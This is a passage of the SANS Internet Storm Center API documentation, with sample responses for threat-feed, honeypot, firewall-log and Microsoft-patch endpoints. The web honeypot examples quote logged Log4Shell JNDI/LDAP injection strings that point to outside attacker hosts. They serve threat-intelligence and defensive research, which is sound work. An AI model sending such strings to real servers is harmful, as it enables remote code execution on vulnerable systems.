Page Information.<br /> Parameters: date, limit</p> <pre>  <a href="/api/daily404detail/2012-02-23/10">http://isc.sans.edu/api/daily404detail/2012-02-23/10</a> <?xml version="1.0" encoding="UTF-8"?> <daily404detail> <data> <url> /robots.txt </url> <user_agent> Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) </user_agent> <source> 207.46.13.147 </source> <data> ... </daily404detail> </pre> <div class="top-link"><a href="#">Top of page</a></div> <h3 id="glossary">glossary</h3> <p>List of glossary terms and definitions<br />Alternatively, append a whole or parital word to "search" in API -  <a href="/api/glossary/data">http://isc.sans.edu/api/glossary/data</a></p> <pre>  <a href="/api/glossary">http://isc.sans.edu/api/glossary</a> <?xml version="1.0" encoding="UTF-8"?> <glossary> <item> <term> 3-WAY HANDSHAKE </date> <definition> Machine A sends a packet with a SYN flag set to Machine B. B acknowledges A's SYN with a SYN/ACK. A acknowledges B's SYN/ACK with an ACK. </records> </item> ... </glossary> </pre> <div class="top-link"><a href="#">Top of page</a></div><h3 id="survivaltime">survivaltime</h3> <p>The average time between reports for an average IP address in seconds.</p> <a href="https://isc.sans.edu/api/survivaltime/2017-08-01">https://isc.sans.edu/api/survivaltime/2017-08-01</a><br/> <pre> <survivaltime> <cummulative>504</cummulative> </survivaltime> </pre> <div class="top-link"><a href="#">Top of page</a></div><h3 id="threatfeeds">threatfeeds</h3> <p>We do collect data from a number of open threat feeds. This API will give you access to this data. Some of this data can also be found as part of the IP or Domain data we return with other API functions. </p> <h4>List of Feeds</h4> <p>  <a href="/api/threatfeeds/">https://isc.sans.edu/api/threatfeeds/</a><br /> Parameters: none</p> <pre> <?xml version="1.0" encoding="UTF-8"?> <threatfeeds> <threatfeed> <type>zeusecc</type> <description><![CDATA[ Zeus Command And Control Server from Abuse.ch ]]></description> <lastupdate>2015-10-24 09:30:00</lastupdate> <datatype>is_ipv4</datatype> <frequency>86400</frequency> </threatfeed> ... more feeds to follow ... </threatfeeds> </pre> <div class="top-link"><a href="#">Top of page</a></div><h4 id="#perday">Total Per Day</h4>  <a href="/api/threatfeeds/perday/2015-10-01/2015-10-20">/api/threatfeeds/perday/2015-10-26/2015-10-27</a><br/> The start and end date are optional. The default is the last 30 days. <pre> <threatfeeds> <day> <count>13345</count> <date>2015-10-26</date> </day> <day> <count>11673</count> <date>2015-10-27</date> </day> </threatfeeds> </pre> <div class="top-link"><a href="#">Top of page</a></div><h4 id="#feedperday">Break Down by Datafeed</h4> <p>  <a href="/api/threatfeeds/feedperday/2015-10-26/2015-10-27/openbl_ssh">/api/threatfeeds/feedperday/2015-10-26/2015-10-27/openbl_ssh</a><br/> (or ommit the feed name at the end to list all)</p> <pre> <threatfeeds> <feedday> <count>60</count> <date>2015-10-26</date> <type>openbl_ssh</type> </feedday> <feedday> <count>48</count> <date>2015-10-27</date> <type>openbl_ssh</type> </feedday> </threatfeeds> </pre> <div class="top-link"><a href="#">Top of page</a></div><h4 id="#threatlist">All current IPs for a specific feed</h4> <p>  <a href="/api/threatlist/shodan/2015-10-01/2015-11-05">/api/threatlist/shodan/2015-10-01/2015-11-05</a><br/> Without date, you will get data from the last 7 days.</p> <pre> <threatlist> <shodan> <ipv4>216.117.2.180</ipv4> <date>2015-10-28</date> <lastseen>2015-11-04</lastseen> </shodan> ... </threatlist> </pre> <div class="top-link"><a href="#">Top of page</a></div><h4 id="threatlisthosts">All current Hosts for a specific feed</h4> <p>  <a href="/api/threatlisthosts/shodan">/api/threatlisthosts/shodan</a> (works for shodan,miner and onyphe)<br/> <pre> <threatlisthosts> <shodan> <hostname>atlantic.census.shodan.io</hostname> <added>2019-05-30 13:02:08</added> <lastseen>2019-05-30 13:02:08</lastseen> </shodan> <shodan> <hostname>battery.census.shodan.io</hostname> <added>2019-05-30 13:02:08</added> <lastseen>2019-05-30 13:02:08</lastseen> </shodan> <shodan> <hostname>border.census.shodan.io</hostname> <added>2019-05-30 13:02:08</added> <lastseen>2019-05-30 13:02:08</lastseen> </shodan> ... </threatlisthosts> </pre> <div class="top-link"><a href="#">Top of page</a></div><h4 id="#threatcategory">All current IPs from all feeds in a specific category</h4> <p> <a href="/api/threatcategory/research/2015-10-20/2015-11-10">/api/threatcategory/research/2015-10-20/2015-11-10</a><br/> Similar to the data above, but for a specific category. By default, you will get data from the last 7 days.</p> <pre> <threatcategory> <research> <ipv4>74.82.47.7</ipv4> <date>2015-10-28</date> <lastseen>2015-11-04</lastseen> <type>shadowserver</type> </research> ... </threatcategory> </pre> <div class="top-link"><a href="#">Top of page</a></div> <h3 id="webhoneypotsummary">webhoneypotsummary</h3> <p>API data for <a href="/webhoneypot/index.html">Webhoneypot: Web Server Log Project</a>.<br /> Parameters: date</p> <pre>  <a href="/api/webhoneypotsummary/2012-12-10">http://isc.sans.edu/api/webhoneypotsummary/2012-12-10</a> <?xml version="1.0" encoding="UTF-8"?> <webhoneypotsummary> <day> 2012-12-10 </day> <reports> 17 </reports> <authors> 2 </authors> <targets> 2 </targets> <sources> 4 </sources> </webhoneypotsummary> </pre> <div class="top-link"><a href="#">Top of page</a></div><h3 id="webhoneypotreportsbyurl">webhoneypotreportsbyurl</h3> <p>Search for complete reports (date, time, url, user-agent, source IP) that contain a specific string in the URL. JSON output highly recommended. By default, today's data is returned. But you may select a specific day.</p> <p> Parameters: String from URL, Date in YYYY-MM-DD format. The URL string should be URL encoded. </p> <p> For example, all URLs from December 11th 2021 that contain the string "jndi:ldap". </p> <pre>  <a href="/api/webhoneypotreportsbyurl/jndi:ldap/2021-12-11?json">/webhoneypotreportsbyurl/jndi:ldap?json</a> [ { "date": "2021-12-11", "time": "00:03:30", "url": "/$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D", "user_agent": "Mozilla/5.0 zgrab/0.x", "source": "20.71.156.146" }, </pre> <div class="top-link"><a href="#">Top of page</a></div><h3 id="webhoneypotreportsbyua">webhoneypotreportsbyua</h3> <p>Search for complete reports (date, time, url, user-agent, source IP) that contain a specific string in the user-agent. JSON output highly recommended. By default, today's data is returned. But you may select a specific day.</p> <p> Parameters: String from User-Agent, Date in YYYY-MM-DD format. The string should be URL encoded. </p> <p> For example, all reports from December 11th 2021 that contain the string "jndi:ldap" as part of the user agent. </p> <pre>  <a href="/api/webhoneypotreportsbyua/jndi:ldap/2021-12-11?json">/webhoneypotreportsbyua/jndi:ldap?json</a> [ { "date": "2021-12-11", "time": "00:13:38", "url": "/", "user_agent": "${jndi:ldap://7e7372f5c19f.bingsearchlib.com:39356/a}", "source": "185.220.101.148" }, ... [ more reports ] ... </pre> <div class="top-link"><a href="#">Top of page</a></div><h3 id="webhoneypotbytype">webhoneypotbytype</h3> <p>API data for <a href="/webhoneypot/types.html">Webhoneypot: Attack By Type</a>.<br /> We currently use a set of regular expressions to determine the type of attack used to attack the honeypot. Output is the top 30 attacks for the last month.</p> <pre>  <a href="/api/webhoneypotbytype">http://isc.sans.edu/api/webhoneypotbytype</a> <?xml version="1.0" encoding="UTF-8"?> <webhoneypotbytype> <item> <reports> 278 </reports> <type> Generic index.php RFI </type> <cve> </cve> </item> ... <item> <reports> 127 </reports> <type> Falcon Series One errors.php RFI </type> <cve> 20076488 </cve> </item> </webhoneypotsummary> </pre> <div class="top-link"><a href="#">Top of page</a></div> <h3 id="openiocsources">openiocsources</h3> <p>Returns firewall logs in OpenIOC format.<br /> <strong>Parameters:</strong> Date, Records (Max: 1000), Page (For iterating beyond 1000 records)</p> <ul> <li><strong>Date:</strong> Y-m-d format of the day in which you wish to obtain firewall logs. Default is today's date.</li> <li><strong>Records:</strong> Number of firewall logs to be returned. Maximum of 1000 per request. Default is 100.</li> <li><strong>Page</strong> Page of records to be returned for Date, for iterating beyond 1000 record maximum per request. Default is 0.</li> </ul> <p>For example, to obtain firewall logs 1000 through 2000 on 2014-08-01, send a request to  <a href="/api/openiocsources/2014-08-01/1000/1">http://isc.sans.edu/api/openiocsources/2014-08-01/1000/1</a>.</p> <p>Here is a simple example of the expected output:</p> <pre>  <a href="/api/openiocsources/2014-08-01/1/0">http://isc.sans.edu/api/openiocsources/2014-08-01/1/0</a> <?xml version="1.0" encoding="UTF-8"?> <ioc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" id="44233BFE-2014-0821-3be61964f8a0" last-modified="2014-08-21T18:18:02Z" xmlns="http://schemas.mandiant.com/2010/ioc"> <short_description>Firewall Logs</short_description> <description>Firewall logs from 2014-08-01</description> <authored_by>SANS Internet Storm Center</authored_by> <authored_date>2014-08-21T18:18:02Z</authored_date> <links /> <definition> <Indicator operator="OR" id="44233BFE-2014-0821-3be61964f8a0"> <Indicator operator="OR" id="44233BFE-2014-0821-1f0e79e965d2"> <IndicatorItem id="44233BFE-2014-0821-75150a133199" condition="is"> <Context document="PortItem" search="PortItem/CreationTime" type="mir" /> <Content type="date">2014-08-01T00:00:00Z</Content> </IndicatorItem> <IndicatorItem id="44233BFE-2014-0821-08776eb79936" condition="is"> <Context document="PortItem" search="PortItem/remoteIP" type="mir" /> <Content type="IP">212.034.154.164</Content> </IndicatorItem> <IndicatorItem id="44233BFE-2014-0821-2449d037028d" condition="is"> <Context document="PortItem" search="PortItem/localPort" type="mir" /> <Content type="int">80</Content> </IndicatorItem> <IndicatorItem id="44233BFE-2014-0821-c4fca0bb8767" condition="is"> <Context document="PortItem" search="PortItem/remotePort" type="mir" /> <Content type="int">47783</Content> </IndicatorItem> </Indicator> </Indicator> </definition> </ioc> </pre> <div class="top-link"><a href="#">Top of page</a></div> <h3 id="getmspatchday">getmspatchday</h3> <p>Returns Microsoft patches issues on a given date</p> <pre>  <a href="/api/getmspatchday/2016-03-08">http://isc.sans.edu/api/getmspatchday/2016-03-08</a> ... <getmspatchday> <id>MS16-023</id> <title>Cumulative Security Update for Internet Explorer</title> <affected> <![CDATA[ Microsoft Windows, Internet Explorer ]]> </affected> <kb>3142015</kb> <exploits>no</exploits> <severity>critical</severity> <clients>critical</clients> <servers>critical</servers> </getmspatchday> ... </pre> <div class="top-link"><a href="#">Top of page</a></div> <h3 id="getmspatch">getmspatch</h3> <p>Returns a Microsoft patch</p> <pre>  <a href="/api/getmspatch/MS16-023">http://isc.sans.edu/api/getmspatch/MS16-023</a> <getmspatch> <id>16023</id> <title>Cumulative Security Update for Internet Explorer</title> <affected> <![CDATA[ Microsoft Windows, Internet Explorer ]]> </affected> <kb>3142015</kb> <exploits>no</exploits> <severity>critical</severity> <clients>critical</clients> <servers>critical</servers> </getmspatch> </pre> <div class="top-link"><a href="#">Top of page</a></div> <h3 id="getmspatchcves">getmspatchcves</h3> <p>Returns the CVEs associated with a particular Microsoft patch</p> <pre>  <a href="/api/getmspatchcves/MS16-023">http://isc.sans.edu/api/getmspatchcves/MS16-023</a> ... <getmspatchcves> <exploitability>1</exploitability> <cve>CVE-2016-0102</cve> </getmspatchcves> <getmspatchcves> <exploitability>1</exploitability> <cve>CVE-2016-0103</cve> </getmspatchcves> ... </pre> <div class="top-link"><a href="#">Top of page</a></div> <h3 id="getmspatchreplaces">getmspatchreplaces</h3> <p>Returns the Microsoft patches replaced by a particular Microsoft patch</p> <pre>  <a href="/api/getmspatchreplaces/MS16-023">http://isc.sans.edu/api/getmspatchreplaces/MS16-023</a> <getmspatchreplaces> <getmspatchreplaces>KB3134814</getmspatchreplaces> <getmspatchreplaces>KB3135174</getmspatchreplaces> <getmspatchreplaces>KB3135173</getmspatchreplaces> </getmspatchreplaces> </pre> <div class="top-link"><a href="#">Top of page</a></div> </div> </div> </div> <span id="isc-menu" class="isc-menu" tabindex="0" aria-label="Open the menu"> <span class="bar" aria-hidden="true"></span> <span class="bar" aria-hidden="true"></span> <span class="bar" aria-hidden="true"></span> </span> <div id="navigation" class="isc-nav"> <ul> <li> <a href="/index.html"> <svg style="width:20px;height:20px" viewBox="0 0 24 24"> <path fill="currentColor" d="M10,20V14H14V20H19V12H22L12,3L2,12H5V20H10Z" /> </svg> Homepage </a> </li> <li> <a href="/diaryarchive.html"> <svg style="width:20px;height:20px" viewBox="0 0 24 24"> <path fill="currentColor" d="M17.5 14.33C18.29 14.33 19.13 14.41 20 14.57V16.07C19.38 15.91 18.54 15.83 17.5 15.83C15.6 15.83 14.11 16.16 13 16.82V15.13C14.17 14.6 15.67 14.33 17.5 14.33M13 12.46C14.29 11.93 15.79 11.67 17.5 11.67C18.29 11.67 19.13 11.74 20 11.9V13.4C19.38 13.24 18.54 13.16 17.5 13.16C15.6 13.16 14.11 13.5 13 14.15M17.5 10.5C15.6 10.5 14.11 10.82 13 11.5V9.84C14.23 9.28 15.73 9 17.5 9C18.29 9 19.13 9.08 20 9.23V10.78C19.26 10.59 18.41 10.5 17.5 10.5M21 18.5V7C19.96 6.67 18.79 6.5 17.5 6.5C15.45 6.5 13.62 7 12 8V19.5C13.62 18.5 15.45 18 17.5 18C18.69 18 19.86 18.16 21 18.5M17.5 4.5C19.85 4.5 21.69 5 23 6V20.56C23 20.68 22.95 20.8 22.84 20.91C22.73 21 22.61 21.08 22.5 21.08C22.39 21.08 22.31 21.06 22.25 21.03C20.97 20.34 19.38 20 17.5 20C15.45 20 13.62 20.5 12 21.5C10.66 20.5 8.83 20 6.5 20C4.84 20 3.25 20.36 1.75 21.07C1.72 21.08 1.68 21.08 1.63 21.1C1.59 21.11 1.55 21.12 1.5 21.12C1.39 21.12 1.27 21.08 1.16 21C1.05 20.89 1 20.78 1 20.65V6C2.34 5 4.18 4.5 6.5 4.5C8.83 4.5 10.66 5 12 6C13.34 5 15.17 4.5 17.5 4.5Z" /> </svg> Diaries </a> </li> <li> <a href="/podcast.html"> <svg style="width:20px;height:20px" viewBox="0 0 24 24"> <path fill="currentColor" d="M17,18.25V21.5H7V18.25C7,16.87 9.24,15.75 12,15.75C14.76,15.75 17,16.87 17,18.25M12,5.5A6.5,6.5 0 0,1 18.5,12C18.5,13.25 18.15,14.42 17.54,15.41L16,14.04C16.32,13.43 16.5,12.73 16.5,12C16.5,9.5 14.5,7.5 12,7.5C9.5,7.5 7.5,9.5 7.5,12C7.5,12.73 7.68,13.43 8,14.04L6.46,15.41C5.85,14.42 5.5,13.25 5.5,12A6.5,6.5 0 0,1 12,5.5M12,1.5A10.5,10.5 0 0,1 22.5,12C22.5,14.28 21.77,16.39 20.54,18.11L19.04,16.76C19.96,15.4 20.5,13.76 20.5,12A8.5,8.5 0 0,0 12,3.5A8.5,8.5 0 0,0 3.5,12C3.5,13.76 4.04,15.4 4.96,16.76L3.46,18.11C2.23,16.39 1.5,14.28 1.5,12A10.5,10.5 0 0,1 12,1.5M12,9.5A2.5,2.5 0 0,1 14.5,12A2.5,2.5 0 0,1 12,14.5A2.5,2.5 0 0,1 9.5,12A2.5,2.5 0 0,1 12,9.5Z" /> </svg> Podcasts </a> </li> <li> <a href="/jobs"> <svg style="width:20px;height:20px" viewBox="0 0 24 24"> <path fill="currentColor" d="M15.5,12C18,12 20,14 20,16.5C20,17.38 19.75,18.21 19.31,18.9L22.39,22L21,23.39L17.88,20.32C17.19,20.75 16.37,21 15.5,21C13,21 11,19 11,16.5C11,14 13,12 15.5,12M15.5,14A2.5,2.5 0 0,0 13,16.5A2.5,2.5 0 0,0 15.5,19A2.5,2.5 0 0,0 18,16.5A2.5,2.5 0 0,0 15.5,14M10,4A4,4 0 0,1 14,8C14,8.91 13.69,9.75 13.18,10.43C12.32,10.75 11.55,11.26 10.91,11.9L10,12A4,4 0 0,1 6,8A4,4 0 0,1 10,4M2,20V18C2,15.88 5.31,14.14 9.5,14C9.18,14.78 9,15.62 9,16.5C9,17.79 9.38,19 10,20H2Z" /> </svg> Jobs </a> </li> <li> <a href="/data"> <svg style="width:20px;height:20px" viewBox="0 0 24 24"> <path fill="currentColor" d="M19 3H5C3.9 3 3 3.9 3 5V19C3 20.1 3.9 21 5 21H19C20.1 21 21 20.1 21 19V5C21 3.9 20.1 3 19 3M9 17H7V10H9V17M13 17H11V7H13V17M17 17H15V13H17V17Z" /> </svg> Data </a> <ul> <li><a href="/data/port.html">TCP/UDP Port Activity</a></li> <li><a href="/data/trends.html">Port Trends</a></li> <li><a href="/data/ssh.html">SSH/Telnet Scanning Activity</a></li> <li><a href="/weblogs">Weblogs</a></li> <li><a href="/data/threatfeed.html">Threat Feeds Activity</a></li> <li><a href="/data/threatmap.html">Threat Feeds Map</a></li> <li><a href="/data/links.html">Useful InfoSec Links</a></li> <li><a href="/data/presentation.html">Presentations & Papers</a></li> <li><a href="/data/researchpapers.html">Research Papers</a></li> <li><a href="/api">API</a></li> </ul> </li> <li> <a href="/tools/"> <svg style="width:20px;height:20px" viewBox="0 0 24 24"> <path fill="currentColor" d="M22.7,19L13.6,9.9C14.5,7.6 14,4.9 12.1,3C10.1,1 7.1,0.6 4.7,1.7L9,6L6,9L1.6,4.7C0.4,7.1 0.9,10.1 2.9,12.1C4.8,14 7.5,14.5 9.8,13.6L18.9,22.7C19.3,23.1 19.9,23.1 20.3,22.7L22.6,20.4C23.1,20 23.1,19.3 22.7,19Z" /> </svg> Tools </a> <ul> <li class="first"><a href="/howto.html">DShield Sensor</a></li> <li><a href="/tools/dnslookup">DNS Looking Glass</a></li> <li><a href="/tools/honeypot">Honeypot (RPi/AWS)</a></li> <li><a href="/tools/glossary">InfoSec Glossary</a></li> </ul> </li> <li> <a href="/contact.html"> <svg style="width:20px;height:20px" viewBox="0 0 24 24"> <path fill="currentColor" d="M15.07,11.25L14.17,12.17C13.45,12.89 13,13.5 13,15H11V14.5C11,13.39 11.45,12.39 12.17,11.67L13.41,10.41C13.78,10.05 14,9.55 14,9C14,7.89 13.1,7 12,7A2,2 0 0,0 10,9H8A4,4 0 0,1 12,5A4,4 0 0,1 16,9C16,9.88 15.64,10.67 15.07,11.25M13,19H11V17H13M12,2A10,10 0 0,0 2,12A10,10 0 0,0 12,22A10,10 0 0,0 22,12C22,6.47 17.5,2 12,2Z" /> </svg>Contact Us </a> <ul> <li class="first"><a href="/contact.html">Contact Us</a></li> <li><a href="/about.html">About Us</a></li> <li><a href="/handler_list.html">Handlers</a></li> </ul> <li> <a href="/about.html"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 30 30" width="20px" height="20px"><path fill="currentColor" d="M 15.001953 3.9921875 C 12.801953 3.9921875 11.001953 5.7821875 11.001953 7.9921875 C 11.001953 10.202188 12.801953 11.992188 15.001953 11.992188 C 17.211953 11.992188 19.011719 10.202187 19.011719 7.9921875 C 19.011719 5.7821875 17.211953 3.9921875 15.001953 3.9921875 z M 6.0019531 8.0039062 C 3.7919531 8.0039062 2.0019531 9.7939062 2.0019531 12.003906 C 2.0019531 14.213906 3.7919531 16.003906 6.0019531 16.003906 C 8.2119531 16.003906 10.001953 14.213906 10.001953 12.003906 C 10.001953 9.7939062 8.2119531 8.0039062 6.0019531 8.0039062 z M 6.0019531 16.003906 L 5.0019531 16.003906 C 2.7919531 16.003906 1.0019531 17.793906 1.0019531 20.003906 L 1.0019531 22.992188 C 1.0019531 23.542188 1.4519531 23.992188 2.0019531 23.992188 L 28.001953 23.992188 C 28.551953 23.992188 29.001953 23.542188 29.001953 22.992188 L 29.001953 20.003906 C 29.001953 17.793906 27.211953 16.003906 25.001953 16.003906 L 24.001953 16.003906 L 23.001953 16.003906 C 22.151953 16.003906 21.362891 16.272422 20.712891 16.732422 C 20.042891 15.142422 18.311719 13.992187 16.261719 13.992188 L 13.751953 13.992188 C 11.701953 13.992188 9.9727344 15.142187 9.3027344 16.742188 C 8.6527344 16.282187 7.8619531 16.003906 7.0019531 16.003906 L 6.0019531 16.003906 z M 24.001953 16.003906 C 26.211953 16.003906 28.001953 14.213906 28.001953 12.003906 C 28.001953 9.7939062 26.211953 8.0039062 24.001953 8.0039062 C 21.791953 8.0039062 20.001953 9.7939062 20.001953 12.003906 C 20.001953 14.213906 21.791953 16.003906 24.001953 16.003906 z M 6.0019531 10.003906 C 7.1019531 10.003906 8.0019531 10.903906 8.0019531 12.003906 C 8.0019531 13.103906 7.1019531 14.003906 6.0019531 14.003906 C 4.9019531 14.003906 4.0019531 13.103906 4.0019531 12.003906 C 4.0019531 10.903906 4.9019531 10.003906 6.0019531 10.003906 z M 24.001953 10.003906 C 25.101953 10.003906 26.001953 10.903906 26.001953 12.003906 C 26.001953 13.103906 25.101953 14.003906 24.001953 14.003906 C 22.901953 14.003906 22.001953 13.103906 22.001953 12.003906 C 22.001953 10.903906 22.901953 10.003906 24.001953 10.003906 z M 5.0019531 18.003906 L 7.0019531 18.003906 C 8.0819531 18.003906 9.0019531 18.923906 9.0019531 20.003906 L 9.0019531 21.992188 L 3.0019531 21.992188 L 3.0019531 20.003906 C 3.0019531 18.903906 3.9019531 18.003906 5.0019531 18.003906 z M 23.001953 18.003906 L 25.001953 18.003906 C 26.081953 18.003906 27.001953 18.923906 27.001953 20.003906 L 27.001953 21.992188 L 21.011719 21.992188 L 21.011719 19.902344 C 21.061719 18.852344 21.931953 18.003906 23.001953 18.003906 z"/></svg> About Us</a></li> </ul>   <div class="questions-sidebar"> <svg width="16" height="16" class="c-nav--footer__svgicon c-slackhash" viewBox="0 0 54 54" xmlns="http://www.w3.org/2000/svg"> <g fill="none" fill-rule="evenodd"> <path d="M19.712.133a5.381 5.381 0 0 0-5.376 5.387 5.381 5.381 0 0 0 5.376 5.386h5.376V5.52A5.381 5.381 0 0 0 19.712.133m0 14.365H5.376A5.381 5.381 0 0 0 0 19.884a5.381 5.381 0 0 0 5.376 5.387h14.336a5.381 5.381 0 0 0 5.376-5.387 5.381 5.381 0 0 0-5.376-5.386" fill="#435165"></path> <path d="M53.76 19.884a5.381 5.381 0 0 0-5.376-5.386 5.381 5.381 0 0 0-5.376 5.386v5.387h5.376a5.381 5.381 0 0 0 5.376-5.387m-14.336 0V5.52A5.381 5.381 0 0 0 34.048.133a5.381 5.381 0 0 0-5.376 5.387v14.364a5.381 5.381 0 0 0 5.376 5.387 5.381 5.381 0 0 0 5.376-5.387" fill="#435165"></path> <path d="M34.048 54a5.381 5.381 0 0 0 5.376-5.387 5.381 5.381 0 0 0-5.376-5.386h-5.376v5.386A5.381 5.381 0 0 0 34.048 54m0-14.365h14.336a5.381 5.381 0 0 0 5.376-5.386 5.381 5.381 0 0 0-5.376-5.387H34.048a5.381 5.381 0 0 0-5.376 5.387 5.381 5.381 0 0 0 5.376 5.386" fill="#435165"></path> <path d="M0 34.249a5.381 5.381 0 0 0 5.376 5.386 5.381 5.381 0 0 0 5.376-5.386v-5.387H5.376A5.381 5.381 0 0 0 0 34.25m14.336-.001v14.364A5.381 5.381 0 0 0 19.712 54a5.381 5.381 0 0 0 5.376-5.387V34.25a5.381 5.381 0 0 0-5.376-5.387 5.381 5.381 0 0 0-5.376 5.387" fill="#435165"></path> </g> </svg> <a rel="noopener" href="/slack/index.html">Slack Channel</a> </div>  <div class="questions-spacer"></div>  <div class="questions-sidebar"> <svg width="16" height="16" viewBox="0 0 54 74" fill="black" xmlns="http://www.w3.org/2000/svg" class="c-nav--footer__svgicon c-slackhash"> <path d="M73.7014 17.4323C72.5616 9.05152 65.1774 2.4469 56.424 1.1671C54.9472 0.950843 49.3518 0.163818 36.3901 0.163818H36.2933C23.3281 0.163818 20.5465 0.950843 19.0697 1.1671C10.56 2.41145 2.78877 8.34604 0.903306 16.826C-0.00357854 21.0022 -0.100361 25.6322 0.068112 29.8793C0.308275 35.9699 0.354874 42.0498 0.91406 48.1156C1.30064 52.1448 1.97502 56.1419 2.93215 60.0769C4.72441 67.3445 11.9795 73.3925 19.0876 75.86C26.6979 78.4332 34.8821 78.8603 42.724 77.0937C43.5866 76.8952 44.4398 76.6647 45.2833 76.4024C47.1867 75.8033 49.4199 75.1332 51.0616 73.9562C51.0841 73.9397 51.1026 73.9184 51.1156 73.8938C51.1286 73.8693 51.1359 73.8421 51.1368 73.8144V67.9366C51.1364 67.9107 51.1302 67.8852 51.1186 67.862C51.1069 67.8388 51.0902 67.8184 51.0695 67.8025C51.0489 67.7865 51.0249 67.7753 50.9994 67.7696C50.9738 67.764 50.9473 67.7641 50.9218 67.7699C45.8976 68.9569 40.7491 69.5519 35.5836 69.5425C26.694 69.5425 24.3031 65.3699 23.6184 63.6327C23.0681 62.1314 22.7186 60.5654 22.5789 58.9744C22.5775 58.9477 22.5825 58.921 22.5934 58.8965C22.6043 58.8721 22.621 58.8505 22.6419 58.8336C22.6629 58.8167 22.6876 58.8049 22.714 58.7992C22.7404 58.7934 22.7678 58.794 22.794 58.8007C27.7345 59.9796 32.799 60.5746 37.8813 60.5733C39.1036 60.5733 40.3223 60.5733 41.5447 60.5414C46.6562 60.3996 52.0437 60.1408 57.0728 59.1694C57.1983 59.1446 57.3237 59.1233 57.4313 59.0914C65.3638 57.5847 72.9128 52.8555 73.6799 40.8799C73.7086 40.4084 73.7803 35.9415 73.7803 35.4523C73.7839 33.7896 74.3216 23.6576 73.7014 17.4323ZM61.4925 47.3144H53.1514V27.107C53.1514 22.8528 51.3591 20.6832 47.7136 20.6832C43.7061 20.6832 41.6988 23.2499 41.6988 28.3194V39.3803H33.4078V28.3194C33.4078 23.2499 31.3969 20.6832 27.3894 20.6832C23.7654 20.6832 21.9552 22.8528 21.9516 27.107V47.3144H13.6176V26.4937C13.6176 22.2395 14.7157 18.8598 16.9118 16.3545C19.1772 13.8552 22.1488 12.5719 25.8373 12.5719C30.1064 12.5719 33.3325 14.1955 35.4832 17.4394L37.5587 20.8853L39.6377 17.4394C41.7884 14.1955 45.0145 12.5719 49.2765 12.5719C52.9614 12.5719 55.9329 13.8552 58.2055 16.3545C60.4017 18.8574 61.4997 22.2371 61.4997 26.4937L61.4925 47.3144Z" fill="inherit"/> </svg> <a rel="me" href="https://infosec.exchange/@sans_isc">Mastodon</a> </div>  <div class="questions-spacer"></div> <div class="questions-sidebar"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 54 54" width="24px" height="24px"><circle cx="28" cy="20" r="12" fill="#9fd5ed"/><circle cx="37" cy="28" r="9" fill="#9fd5ed"/><circle cx="30" cy="29" r="9" fill="#9fd5ed"/><circle cx="18" cy="29" r="9" fill="#9fd5ed"/><circle cx="24" cy="28" r="9" fill="#9fd5ed"/><circle cx="11" cy="28" r="9" fill="#9fd5ed"/><circle cx="15" cy="21" r="7" fill="#9fd5ed"/><radialGradient id="UWqm9mhW35Ao~JVa4RzWya" cx="28" cy="20" r="12" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e3f4ff"/><stop offset="1" stop-color="#e3f4ff" stop-opacity="0"/></radialGradient><circle cx="28" cy="20" r="12" fill="url(#UWqm9mhW35Ao~JVa4RzWya)"/><radialGradient id="UWqm9mhW35Ao~JVa4RzWyb" cx="37" cy="28" r="9" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e3f4ff"/><stop offset="1" stop-color="#e3f4ff" stop-opacity="0"/></radialGradient><circle cx="37" cy="28" r="9" fill="url(#UWqm9mhW35Ao~JVa4RzWyb)"/><radialGradient id="UWqm9mhW35Ao~JVa4RzWyc" cx="30" cy="29" r="9" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e3f4ff"/><stop offset="1" stop-color="#e3f4ff" stop-opacity="0"/></radialGradient><circle cx="30" cy="29" r="9" fill="url(#UWqm9mhW35Ao~JVa4RzWyc)"/><radialGradient id="UWqm9mhW35Ao~JVa4RzWyd" cx="18" cy="29" r="9" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e3f4ff"/><stop offset="1" stop-color="#e3f4ff" stop-opacity="0"/></radialGradient><circle cx="18" cy="29" r="9" fill="url(#UWqm9mhW35Ao~JVa4RzWyd)"/><radialGradient id="UWqm9mhW35Ao~JVa4RzWye" cx="24" cy="28" r="9" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e3f4ff"/><stop offset="1" stop-color="#e3f4ff" stop-opacity="0"/></radialGradient><circle cx="24" cy="28" r="9" fill="url(#UWqm9mhW35Ao~JVa4RzWye)"/><radialGradient id="UWqm9mhW35Ao~JVa4RzWyf" cx="11" cy="28" r="9" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e3f4ff"/><stop offset="1" stop-color="#e3f4ff" stop-opacity="0"/></radialGradient><circle cx="11" cy="28" r="9" fill="url(#UWqm9mhW35Ao~JVa4RzWyf)"/><radialGradient id="UWqm9mhW35Ao~JVa4RzWyg" cx="15" cy="21" r="7" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e3f4ff"/><stop offset="1" stop-color="#e3f4ff" stop-opacity="0"/></radialGradient><circle cx="15" cy="21" r="7" fill="url(#UWqm9mhW35Ao~JVa4RzWyg)"/></svg> <a rel="me" href="https://bsky.app/profile/sansisc.bsky.social">Bluesky</a> </div> <div class="questions-spacer"></div> <div class="questions-sidebar"> <svg width="16" height="16" viewBox="0 0 1200 1227" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M714.163 519.284L1160.89 0H1055.03L667.137 450.887L357.328 0H0L468.492 681.821L0 1226.37H105.866L515.491 750.218L842.672 1226.37H1200L714.137 519.284H714.163ZM569.165 687.828L521.697 619.934L144.011 79.6944H306.615L611.412 515.685L658.88 583.579L1055.08 1150.3H892.476L569.165 687.854V687.828Z" fill="black"/> </svg> <a rel="noopener" href="https://twitter.com/sans_isc">X</a> </div> <div id="sidebar"> </div> </div> <div id="footer"> <div class="footer-container"> <div class="footer-links"> <span>© 2024 SANS™ Internet Storm Center</span> <span>Developers: We have an <a href="/api/">API</a> for you!   <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/"><img class="lazyload" alt="Creative Commons License" src="/images/cc.png"></a></span> <ul id="footLinks"> <li><a href="/linkback.html">Link To Us</a></li> 